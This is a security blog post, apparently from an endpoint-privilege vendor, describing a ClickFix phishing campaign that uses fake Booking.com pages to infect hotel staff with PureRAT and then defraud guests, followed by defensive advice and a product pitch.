A widespread phishing campaign is targeting hotels worldwide, using fake Booking.com pages to trick staff into installing PureRAT malware. Once inside, attackers steal booking platform credentials and use real reservation details to scam guests out of their banking information.
The campaign has been active since at least April 2025 and was still operational as of early October 2025. The attack turns compromised hotels into unwitting accomplices in fraud against their own customers.
How the Attack Works
The campaign uses a social engineering technique called ClickFix, which tricks users into running malicious commands by displaying fake error messages or CAPTCHA checks. Attacks begin with malicious emails sent to hotels that resemble legitimate customer requests through Booking.com. Some emails appear to come from other compromised hotel accounts, while others have forged headers to spoof Booking.com directly.
When hotel staff click links in these emails, they land on fake Booking.com pages displaying what appears to be a security verification. The page shows a fake CAPTCHA or error message with instructions telling users to:
- Press Windows + R to open the Run dialog
- Paste a command that’s automatically copied to their clipboard
- Hit Enter to resolve the issue
Instead of fixing anything, the malicious PowerShell command gathers system information, downloads a ZIP archive, and loads PureRAT malware through DLL side-loading.
From Hotels to Guests
Getting malware on hotel computers is just phase one. Attackers use stolen credentials to access booking platforms like Booking.com and Expedia, then leverage real reservation details to target hotel customers.
Guests receive messages via email or WhatsApp containing accurate information about their reservations. The messages claim there’s a security issue requiring them to verify their banking details to prevent their booking from being canceled. Links take victims to fake Booking.com or Expedia pages designed to harvest credit card information.
Because the messages contain legitimate reservation details and appear to come from the hotel’s actual Booking.com account, guests have little reason to doubt their authenticity.
PureRAT Capabilities
PureRAT is a modular remote access trojan with extensive capabilities, including remote desktop control, webcam and microphone access, keylogging, file management, cryptocurrency wallet hijacking, and the ability to launch DDoS attacks. It’s protected by .NET Reactor to make analysis harder and establishes persistence by creating Windows registry entries.
Once installed, PureRAT gives attackers everything they need to monitor systems, steal credentials, and maintain long-term access to networks.
Increasing Sophistication of Cyberattacks
The campaign reflects a professionalization of fraud targeting the hospitality industry, with cybercriminals adopting an “as-a-service” model that lowers entry barriers and maximizes profits.
Researchers observed Telegram bots selling Booking.com logs, and a threat actor named “moderator_booking” advertising services to purchase logs from Booking.com, Expedia, Airbnb, and Agoda. These services even include manual verification of stolen credentials within 24 to 48 hours.
Log checker tools are available for as low as $40 on cybercrime forums, making it cheap and easy for criminals to verify that stolen accounts still work. Some attackers are even hiring specialists called “traffers” specifically to handle malware distribution, further dividing labor and increasing efficiency.
Why ClickFix Works
ClickFix exploits users’ natural tendency to solve technical problems and their familiarity with CAPTCHA verification prompts. When someone sees an error message with clear instructions to fix it, their instinct is to follow those steps. This is especially true for busy hotel staff who need to maintain access to booking platforms to do their jobs.
The technique also bypasses many traditional security controls because the victim runs the malicious code themselves. Email filters might catch malicious attachments, but they can’t stop users from manually copying and pasting commands into their own terminals.
Recent variations of ClickFix have gotten more sophisticated. Pages can now adapt to display instructions matching the victim’s operating system, automatically copy malicious code to the clipboard, and even include embedded videos and countdown timers to increase credibility.
What Hotels Can Do
This attack relies entirely on social engineering, which means the right training and procedures can stop it.
Train staff to recognize ClickFix attacks. Anyone asking you to manually run code or paste commands into Windows Run, PowerShell, or Terminal is trying to compromise your system. Legitimate services don’t ask users to run PowerShell commands, even if the page looks exactly like Booking.com.
Monitor and restrict PowerShell execution. Organizations can detect ClickFix attacks by monitoring for PowerShell downloads from URLs, suspicious script execution, and the creation of registry Run keys via PowerShell. Consider restricting PowerShell access to IT staff only, or implementing application whitelisting to block unauthorized scripts.
Verify requests through separate channels. If you receive an urgent message about booking platform issues, don’t click the link. Instead, go directly to Booking.com through your browser or contact their support team through verified channels.
Use strong email filtering. While email filters can’t stop users from manually executing commands, they can block many of the initial phishing emails before they reach staff inboxes.
Implement network segmentation. Limit what compromised workstations can access. If a front desk computer gets infected, it shouldn’t have access to your entire network or sensitive financial systems.
Hotels need to warn their customers about these scams too. Send proactive communications explaining that:
- You’ll never ask customers to verify banking details through email or WhatsApp links
- Booking.com won’t ask for credit card details outside their official platform
- Any messages claiming bookings will be canceled unless customers “verify” their payment information are scams
Consider adding these warnings to booking confirmation emails, check-in procedures, and hotel room materials.
Why This Keeps Working
The hospitality industry has become a high-value target because hotels sit at the intersection of customer data, financial information, and often understaffed IT departments. Attackers know this and they’re building entire ecosystems of services to exploit it.
This campaign highlights the reality that people remain the weakest link in cybersecurity. Technical controls matter, but they can’t stop an authorized user from running malicious code when a fake error message convinces them it’s necessary.
Training helps, but people make mistakes. When they do, privilege management limits the damage. Admin By Request EPM restricts which processes can run with elevated privileges, preventing malware from establishing persistence or spreading across your network.
Want to see what EPM can do? Book a demo or try our free plan for up to 25 endpoints.
